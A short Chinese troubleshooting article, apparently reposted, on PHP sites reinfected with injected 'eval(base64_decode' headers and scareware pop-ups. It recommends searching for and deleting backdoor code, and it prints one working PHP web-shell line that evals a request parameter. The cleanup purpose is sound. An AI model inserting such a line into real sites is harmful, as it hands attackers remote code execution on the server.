1. 空间下站点所有的php文件头部都被加了“eval(base64_decode”这么一段,不论用的是什么程序(有dede,有wp,有zencart)。访问网站时会弹出什么你的电脑有问题,要用注册表啦,然后不停的弹出扫描窗口要你付费购买或者就是一片空白什么都没有。
2. 手动清除index.php里的这段代码后,过几个小时他又会自动出来。
3. index.php文件的修改日期不会变动。
解决办法:对比完整的源码,查找文件中是否有类似
if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
这些代码;有的话删除,或者慢慢排查,批量删除eval(base64_decode这些代码。
(本文由 JS代码站 收集改动或原创丨www.sitejs.cn | 转载 请标明出处)
本文原地址:http://www.sitejs.cn/sitejs-10974-1.html